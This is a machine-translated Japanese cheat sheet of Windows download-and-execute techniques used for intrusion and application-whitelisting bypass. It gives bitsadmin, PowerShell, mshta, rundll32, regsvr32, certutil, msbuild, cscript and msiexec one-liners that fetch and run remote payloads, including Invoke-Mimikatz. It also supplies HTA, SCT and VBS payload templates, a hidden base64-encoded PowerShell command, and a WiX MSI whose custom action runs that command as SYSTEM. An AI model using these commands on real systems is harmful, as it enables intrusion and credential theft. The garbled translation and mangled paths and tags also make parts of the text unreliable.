.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
1.BitsAdminコマンド(指定されたパス、Win7以降にコマンドのみをダウンロードできます):
bitsadmin/mydownloadjob/download/download/priority normal 'http://img5.5.5.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg' 'D: \ ABC.jpg' '' '' d: \
BitsAdmin /Transfer D90f 3http://Site.com/A%AppData%\ D90f.exe%AppData%\ D90f.exedel%appdata%\ d90f.exe
2.PowerShellの名前のダウンロードと実行:( Win7以降)
PowerShell IEX(new-Object Net.WebClient).DownLoadString( 'https://Raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1'); Invoke-Mimikatz
Powershell -exec bypass -f \\ webdavserver \ folder \ payload.ps1
powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.168.183/1.exe','C:\111111111111111111111.exe')
PowerShell -W Hidden -C(new-Object System.net.WebClient).DownLoadFile( 'http://img5.cache.netease.com/photo/0001/2013-03-28/8r1bk3qo3r710001.jpg'、 'd3360 \\ 1.jpg')
3.mshtaコマンドダウンロードと実行
MSHTA VBScript:Close(execute( 'getObject(' 'script:http://webserver/payload.sct' ')))))
MSHTA http://Webserver/payload.hta ---短いドメイン名:http://SINA.lt/ - MSHTA http://T.CN/RYUQYF8
mshta \\ webdavserver \ folder \ payload.hta
payload.hta
HTML
Meta http-equiv='content-type' content='text/html; charset=utf-8 '
頭
スクリプト言語='vbscript'
window.resizeto 0、0
Window.Moveto -2000、-2000
set objshell=createObject( 'wscript.shell')
objshell.run 'calc.exe'
self.close
/スクリプト
体
デモ
/体
/頭
/HTML
4。 rundll32コマンドダウンロードと実行
rundll32 \\ webdavserver \ folder \ payload.dll、エントリポイント
rundll32.exe javascript: '\ . \ mshtml、runhtmlapplication'; o=getobject( 'script:3358webserver/payload.sct'); window.close();
参照:https://github.com/3gstudent/javascript-backdoor
5.NET Regasmコマンドをダウンロードして実行します
c: \ windows \ microsoft.net \ framework64 \ v4.0.30319 \ regasm.exe /u \ webdavserver\folder\payload.dll
6.CMDリモートコマンドのダウンロード:
cmd.exe /k \\ webdavserver \ folder \ batchfile.txt
7.REGSVR32コマンドのダウンロードと実行
regsvr32 /u /n /s /i3360http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i: \ webdavserver\folder\payload.sct scrobj.dll
regsvr32 /u /s /i:3358site.com/js.png scrobj.dll
js.png
?xmlバージョン='1.0'?
スクリプトレット
登録
progid='shortjsrat'
classId='{10001111-0000-0000-0000-0000-0000Feedacdc}'
! - Casey Smith @Subteeから学ぶ -
スクリプト言語='jscript'
![cdata [
ps='cmd.exe /c calc.exe';
new ActiveXObject( 'wscript.shell')。run(ps、0、true);
]]
/スクリプト
/登録
/スクリプトレット
8.Certutilコマンドのダウンロードと実行
certutil -urlcache -split -f http://webserver/ペイロードペイロード
certutil -urlcache -split -f http://webserver /payload.b64 payload.b64 certutil -decode payload.b64 payload.dll c: \ windows \ microsoft.net \ framework64 \ v4.0.30319 \ instalutil /logfile=ulgfile=ul gaylod.
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 certutil -decode payload.b64 payload.exe payload.exe
certutil -urlcache -split -f http://site.com/a a.exe a.exe del a.exe certutil -urlcache -f http://192.168.254.102:80/a Delete
9.net 9.net
でmsbulidコマンドをダウンロードして実行しますcmd /v /c 'set mb=' c: \ windows \ microsoft.net \ framework64 \ v4.0.30319 \ msbuild.exe '!mb! /noauteresponse /preprocess \\ webdavserver \ folder \ payload.xml payload.xml!mb! payload.xml '
10。 ODBCCONFコマンドのダウンロードと実行
odbcconf /s /a {regsvr \\ webdavserver \ folder \ payload_dll.txt}
11.cscriptスクリプトリモートコマンドのダウンロードと実行
cscript/b c: \ windows \ system32 \ printing_admin_scripts \ zh-cn \ pubprn.vbs 127.0.0.1 Script:https://raw.githubusercontent.com/3gstudent/test/master/downdoadexec3.sct
cscript //e:jscript \\ webdavserver \ folder \ payload.txt
downfile.vbs:
'設定を設定します
strfileurl='https://hacker.bz/t/tu/ckhxbukkqru9204.jpg'
strhdlocation='c: \ logo.jpg'
'ファイルを取得します
set objxmlhttp=createObject( 'msxml2.xmlhttp')
objxmlhttp.open 'get'、strfileurl、false
objxmlhttp.send()
objxmlhttp.status=200の場合
objadostream=createObject( 'adodb.stream')を設定します
objadostream.open
objadostream.type=1 'adtypebinary
objadostream.write objxmlhttp.responsebody
objadostream.position=0'STREMの位置を開始までセットします
set objfso=createObject( 'scripting.filesystemobject')
objfso.fileexists(strhdlocation)の場合、objfso.deletefile strhdlocation
objfso=何も設定しません
objadostream.savetofile strhdlocation
objadostream.close
objadostream=Nothingを設定します
ifを終了します
objxmlhttp=何も設定しません
上記をdownfile.vbsとして保存します
コマンドを入力してください:cscript downfile.vbs
12.pubprn.vbsコマンドをダウンロードして実行
cscript /b c: \ windows \ system32 \ printing_admin_scripts \ zh-cn \ pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.scs
13.windowsには独自のコマンドコピーが付属しています
コピー\\ x.x.x.x \ xx \ poc.exe
Xcopy D: \ test.exe \\ x.x.x \ test.exe
14。 iexplore.exeコマンドをダウンロードして実行します(つまり、odayが必要です)
'C: \ Program Files \ Internet Explorer \ iexplore.exe' http://site.com/exp
15.ieexcコマンドのダウンロードと実行
c: \ windows \ microsoft.net \ framework \ v2.0.50727 \ caspol -s off
c: \ windows \ microsoft.net \ framework \ v2.0.50727 \ ieexec http://site.com/files/test64.exe
参照:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
16。 msiexecコマンドのダウンロードと実行
msiexec /q /i https://hacker.bz/t/tu/icr2sy1pdlx9205.png
この方法は、以前の2つの記事《渗透测试中的msiexec》 《渗透技巧——从Admin权限切换到System权限》で紹介されています。この方法を紹介しましたが、詳細を繰り返しません。
まず、Base64エンコーディングは、PowerShell実装のダウンロードと実行のコードとして使用されます。
$ filecontent='(new-Object System.net.webclient).downloadfile(' https://github.com/3gstudent/test/raw/master/putty.exe '、' c: \ download \ a.exe '); start-process' c3360
$ bytes=[system.text.encoding] :3360Unicode.getBytes($ filecontent);
$ encoded=[System.Convert] :3360TOBASE64STRING($ bytes);
$エンコード
得る:
kabuaguadwatag8aygbqaguaywb0acaauwb55ahmadablag0algboaguadauafcazqbiaemababguabguabgB0Ackalgbeag8adwbuagwabw bhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwazagcacwb0ahuazablag4adavahqazqbz ahqalwbyageadwavag0ayqbzahqazqbyac8acab1ahqadab5ac4azqb4aguajwasaccaywa6afwazabvahcabgbsag8ayqbkafwayqaua guaeablaccaka7ahmadabhahiaatahaacgbvagmazqbzahmaiaanagmaogbcagqabwb3ag4abvageazabcagealgblahgazqanaa==
完全なPowerShellコマンドは次のとおりです。
PowerShell -WindowStyle Hidden -Ec kabuaguadwatag8aygbqaguaywb0acaauwb55ahmadablag0algboaguadauafcazqbiaemababguabguabgB0Ackalgbeag8adwbuagwabw bhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwazagcacwb0ahuazablag4adavahqazqbz ahqalwbyageadwavag0ayqbzahqazqbyac8acab1ahqadab5ac4azqb4aguajwasaccaywa6afwazabvahcabgbsag8ayqbkafwayqaua guaeablaccaka7ahmadabhahiaatahaacgbvagmazqbzahmaiaanagmaogbcagqabwb3ag4abvageazabcagealgblahgazqanaa==
完全なWIXファイルは次のとおりです。
?xmlバージョン='1.0'?
WIX XMLNS='http://SCHEMAS.MICROSOFT.COM/WIX/2006/WI'
製品ID='*' upgradeCode='12345678-1234-1234-1234-11111111111111111111111111111111111111111111111111111111111111111年目の例
名前'バージョン=' 0.0.1 'メーカー='@_ xpn_ '言語=' 1033 '
パッケージinstallerversion='200'圧縮='はい'コメント='Windowsインストーラーパッケージ'/
メディアID='1' /
ディレクトリid='targetdir' name='sourcedir'
ディレクトリID='ProgramFilesFolder'
ディレクトリid='installlocation' name='example'
Component Id='ApplicationFiles' Guid='12345678-1234-1234-1234-2222222222222222222222222222222222222222
/成分
/ディレクトリ
/ディレクトリ
/ディレクトリ
feature id='defaultfeature' level='1'
componentref id='applicationFiles'/
/特徴
プロパティID='CMDLINE'POWERSHELL -WINDOWSTYLE HIDDEN -ENC kabuaguadwatag8aygbqaguaywb0acaauwb55ahmadablag0algboaguadauafcazqbiaemababguabguabgB0Ackalgbeag8adwbuagwabw bhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwazagcacwb0ahuazablag4adavahqazqbz ahqalwbyageadwavag0ayqbzahqazqbyac8acab1ahqadab5ac4azqb4aguajwasaccaywa6afwazabvahcabgbsag8ayqbkafwayqaua guaeablaccaka7ahmadabhahiaatahaacgbvagmazqbzahmaiaanagmaogbcagqabwb3ag4abvageazabcagealgblahgazqanaa==
/財産
Customaction ID='SystemShell' execute='Deferred' Directory='TargetDir'
execommand='[cmdline]' return='無視' Imprionate='no'/
customaction id='failinstall' execute='deferred' script='vbscript' return='check'
VBSがインストールに失敗するように無効になりました
/カスタムアクション
InstallexecuteSequence
カスタムアクション='Systemshell' after='installInitialize'/custom
カスタムアクション='failinstall' before='installfiles'/custom
/installexecuteSequence
/製品
/wix
コンパイルしてMSIファイルを生成します。コマンドは次のとおりです。
candle.exe msgen.wix
light.exe msgen.wixobj
test.msiを生成します
実装関数:msiexec/q/i 3https://github.com/3gstudent/test/raw/master/test.msi
注:実行後、プロセスを手動で終了する必要がありますmsiexec.exe
Baiduが提供する短いアドレスサービス(http://dwz.cn/)と組み合わせると、実装コードは34文字で、コードは次のとおりです。
msiexec /q /i http://dwz.cn/6ujpf8
17。コマンドをダウンロードして、Project GreatSct
を実行しますhttps://github.com/greatsct/